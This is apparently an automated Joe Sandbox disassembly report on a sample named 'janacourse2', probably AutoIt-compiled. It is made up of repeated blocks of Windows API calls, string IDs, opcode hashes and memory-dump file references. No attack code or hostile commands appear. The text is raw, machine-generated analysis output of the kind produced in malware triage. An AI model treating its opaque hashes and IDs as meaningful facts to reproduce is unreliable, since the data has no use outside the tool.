                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                            • Opcode ID: 08102e40010e47c66b7ad03cff0503fe953975b1f18b0df39d32fd4915501913
                                                                                                            • Instruction ID: 917215f809e8ee2e6122c0c8e6f0c747a623a5d9fa68a10e3f45da01c26873c2
                                                                                                            • Opcode Fuzzy Hash: 08102e40010e47c66b7ad03cff0503fe953975b1f18b0df39d32fd4915501913
                                                                                                            • Instruction Fuzzy Hash: 95010432E0052A8BDB21AFBECC808BF3BE5EB61610B400564E99292189EBBBD440C750
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01011D4C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 9e5962e0ed62a44ea0f2e5e7bcfd0d84cad9fd9d6f134b9ff907f9e9c3fd7e4e
                                                                                                            • Instruction ID: 32e435c1f07aa18dc5fe9eb55b9d9eeaf3595c0cc6c2738553610f1ac90e6511
                                                                                                            • Opcode Fuzzy Hash: 9e5962e0ed62a44ea0f2e5e7bcfd0d84cad9fd9d6f134b9ff907f9e9c3fd7e4e
                                                                                                            • Instruction Fuzzy Hash: 72014C7560121DABDB08FBB5CD50CFE77A8FF16350B400509EAB25B3C4EA785408CB60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 01011C46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 105daad3384d54212fd97df4528609b1f9c51c8c88b9183e5872d79dac8d453f
                                                                                                            • Instruction ID: 6165efef5180b51dbd4ac0fea15836bdf3945aaf224c26f7b8909480df1d4195
                                                                                                            • Opcode Fuzzy Hash: 105daad3384d54212fd97df4528609b1f9c51c8c88b9183e5872d79dac8d453f
                                                                                                            • Instruction Fuzzy Hash: 04012BB5B4110D67DB08EBA1CE51DFF77E8AF11340F100019AA8667285EA78AA08CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 01011CC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 154ec5c82e02fa67050165e17eed2522bac255d14ab5e2b2e19c6094bf1a1f05
                                                                                                            • Instruction ID: c1ad5b0d4f0e6b1f44263db6f2c237cc70d356874218d33019c6a4938ebfcef8
                                                                                                            • Opcode Fuzzy Hash: 154ec5c82e02fa67050165e17eed2522bac255d14ab5e2b2e19c6094bf1a1f05
                                                                                                            • Instruction Fuzzy Hash: 88012BB5A0011D67DF08E7A5CF41AFF77E8AB11340F100015AA8667285EA789A08CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01011DD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: facd492e1c3aa67a6c9446e54c34e540d732a20e1a3d21ad93356b65ad558c09
                                                                                                            • Instruction ID: dcbd0c7786c1755d43aec5a34d1b810eab704d969edbfa5b882e09ff6163b868
                                                                                                            • Opcode Fuzzy Hash: facd492e1c3aa67a6c9446e54c34e540d732a20e1a3d21ad93356b65ad558c09
                                                                                                            • Instruction Fuzzy Hash: 15F04970A0021967DB08F7A5CC81BFF77A8AB01350F400808BAA2672C4EA7855088760
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: 3, 3, 16, 1
                                                                                                            • API String ID: 176396367-3042988571
                                                                                                            • Opcode ID: 9c3284a6ef4b2411c3b8476176b6d521bd165db01887e4f0255910b282d27005
                                                                                                            • Instruction ID: 8297262f460bb87fdb590bed396ba0e8a1f60b7a3bb2cdf9f320a1c3791ef4e5
                                                                                                            • Opcode Fuzzy Hash: 9c3284a6ef4b2411c3b8476176b6d521bd165db01887e4f0255910b282d27005
                                                                                                            • Instruction Fuzzy Hash: 67E02B42601320219271137F9CC197F7ACECFC9690714182BFAC5C2366EFA8ED9193A1
                                                                                                            APIs
                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01010B23
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                            • Opcode ID: 571db099590e1c4caee01eb18dcec0ec7533ccaae916ea4d46b5068085aaf458
                                                                                                            • Instruction ID: 9b1cb56fa469f093ec00c027b9238394a49b2bc485c47771c034107bc35486ce
                                                                                                            • Opcode Fuzzy Hash: 571db099590e1c4caee01eb18dcec0ec7533ccaae916ea4d46b5068085aaf458
                                                                                                            • Instruction Fuzzy Hash: 9CE0D83128531837E2143795BE43FC97B859F05B10F10446EFBD4995C38EDA249016ED
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FCF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FD0D71,?,?,?,00FB100A), ref: 00FCF7CE
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FD0D75
                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FD0D84
                                                                                                            Strings
                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FD0D7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                            • API String ID: 55579361-631824599
                                                                                                            • Opcode ID: ffcd99318178deb79fa3f10f979363158bd7d8e1e8ac14d5402cf9f866113f29
                                                                                                            • Instruction ID: 287e5590bd4cd92a42f350f103faff0adc85ea85f5e68f0d9b88eb94430db404
                                                                                                            • Opcode Fuzzy Hash: ffcd99318178deb79fa3f10f979363158bd7d8e1e8ac14d5402cf9f866113f29
                                                                                                            • Instruction Fuzzy Hash: F7E06DB42003028BE3309FBEE6447467BE2AF04B45F04892EE4C6C7746DFB9E4449BA1
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0102302F
                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 01023044
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Temp$FileNamePath
                                                                                                            • String ID: aut
                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                            • Opcode ID: a58688428f20d6645818598147587777666f0d2b4a206942fd71469bffc7d844
                                                                                                            • Instruction ID: b2d4cd4b920d02d070e715df4994f445699993e8575fc3e2cad99d9419c6e2a8
                                                                                                            • Opcode Fuzzy Hash: a58688428f20d6645818598147587777666f0d2b4a206942fd71469bffc7d844
                                                                                                            • Instruction Fuzzy Hash: 9CD05BB550131477EB30A6959E4DFC73A6CD704650F0001517695D6085DAF59544CFD4
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: %.3d$X64
                                                                                                            • API String ID: 481472006-1077770165
                                                                                                            • Opcode ID: efb62a7dd21a068c45ee7d5b603f3d386e082badc266c822c0e949d67702988d
                                                                                                            • Instruction ID: 8fa0ba30031847b6db04aec83a676cea4166f6851784b9e85f6344b870f29331
                                                                                                            • Opcode Fuzzy Hash: efb62a7dd21a068c45ee7d5b603f3d386e082badc266c822c0e949d67702988d
                                                                                                            • Instruction Fuzzy Hash: D2D05BB1C09119FADB5196D0CE4ADBDF37CFB68351F408466F98AD1080D738D5085B71
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0104232C
                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0104233F
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: 9b89e946361f00e9ed57cf40ddaa3692c2cace36a57f856ed14207c38e74be1e
                                                                                                            • Instruction ID: 32397795d8b04a2d4ceec68485634b9bd868795e219de6bb996c7f3e34e506ef
                                                                                                            • Opcode Fuzzy Hash: 9b89e946361f00e9ed57cf40ddaa3692c2cace36a57f856ed14207c38e74be1e
                                                                                                            • Instruction Fuzzy Hash: 01D0A9BA791300B7F274A331DE4FFCABA14AB00B00F0049067786AA1C8C8B9A800CB44
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0104236C
                                                                                                            • PostMessageW.USER32(00000000), ref: 01042373
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: eaa84d3d3a54044390a9704d3e21a2367a95b37ee712433847bc2d64939fece7
                                                                                                            • Instruction ID: 52b95bf0cd67160952cc00ef6553e13e915023421d384ee07c6b4cea5d83917c
                                                                                                            • Opcode Fuzzy Hash: eaa84d3d3a54044390a9704d3e21a2367a95b37ee712433847bc2d64939fece7
                                                                                                            • Instruction Fuzzy Hash: F1D0A9B67823007BF274A331DE4FFCAB614AB04B00F0049067782AA1C8C8B9A800CB48
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FEBE93
                                                                                                            • GetLastError.KERNEL32 ref: 00FEBEA1
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FEBEFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0
                                                                                                            • Opcode ID: 61d1cfbf43deb0224a729a8e4f0e90667d902f60060b95a83d566d8598b627ec
                                                                                                            • Instruction ID: 1ad55863ff90c7544acc9e5a208685640173b75b358b662453ef17f24cb3da64
                                                                                                            • Opcode Fuzzy Hash: 61d1cfbf43deb0224a729a8e4f0e90667d902f60060b95a83d566d8598b627ec
                                                                                                            • Instruction Fuzzy Hash: 6041E835A052C6AFDF218FA6CC44BBB7BA5EF41320F144169F959972A1DB318D00EB60